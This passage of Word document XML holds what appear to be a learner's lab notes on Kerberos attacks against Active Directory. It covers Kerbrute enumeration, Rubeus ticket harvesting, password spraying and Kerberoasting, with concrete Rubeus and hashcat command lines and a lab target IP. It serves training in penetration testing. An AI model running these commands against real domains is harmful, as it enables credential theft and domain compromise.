          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerbrute Enumeration – no domain access required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD43D4E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pass the Ticket – access as a user to the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240A66F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberoasting – access as any user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DED02" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AS-REP Roasting – access as any user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BA22CC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Golden Ticket – Full domain compromise (admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D5A102" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Silver Ticket – Service hash required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8EACB5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Skeleton Key – Full domain compromise (admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48847392" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration with Kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C527D63" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>By brute-forcing Kerberos pre-authentication, “account failed to log on” event is not triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A0EE2C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Brute-forcing can only be done by sending a single UDP frame to the KDC allowing user to enumerate domain users from a wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDDD217" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>see syntax above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD1C0D5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Harvesting and Brute-Forcing Tickets with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DF6440" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>powerful tool for attacking Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D15BFEC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>adaptation of Kekeo tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66707DF3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>overpass the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049CBC7B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ticket requests and renewals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF76F10" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ticket management, extraction, harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C6B04" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>pass the ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105246C2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AS-REP Roasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F712CD6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberoasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D1D598" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/GhostPack/Rubeus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53FC2FD7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>On targeted machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC41C42" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>find Rubeus executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7CB896" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Rubeus.exe harvest  /interval:30 – Rubeus harvests for TGTs every 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC23D90" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Brute-Forcing/Password-Spraying with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC0ACCF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>single user account and wordlist of passwords to see which works for given account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB23F77" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Take given Kerberos-based password and spray it against all found users and return a .kirbi ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A398FE5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>TGT ticket that can be used in order to get service tickets from KDC as well as be used in attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5231F7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>pass the ticket attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25538841" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>add IP and domain name to hosts file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109EEFF2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>syntax echo &lt;target ip&gt; &lt;domain&gt; &gt;&gt; &lt;PATH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C67D195" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. echo 10.10.138.156 CONTROLLER.local &gt;&gt; C:\Windows\System32\drivers\etc\hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E02395" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>run Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1FEE5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Rubeus.exe brute /password:Password1 /noticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575C6318" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>may cause lockout depending on policies of domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5269A3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerbroasting with Rubeus &amp; Impacket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB447F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>popular Kerberos attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F6B0A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>allows user to request a service ticket for any service with a registered SPN and use ticket to crack the service password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A5399" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>success of attack depends on password and if it is trackable as well as the privileges of the cracked service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215DCD0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating kerberoastable accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC4F54B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E03475D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberoasting with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED5A435" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Rubeus.exe kerberoast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150974E6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>copy outputs into hash text file on attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D667E9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>crack with hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D0CA5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>hashcat -m 13100 -a 0 hash.txt &lt;wordlist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAD5DB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Impacket</w:t>
      </w:r>
    </w:p>
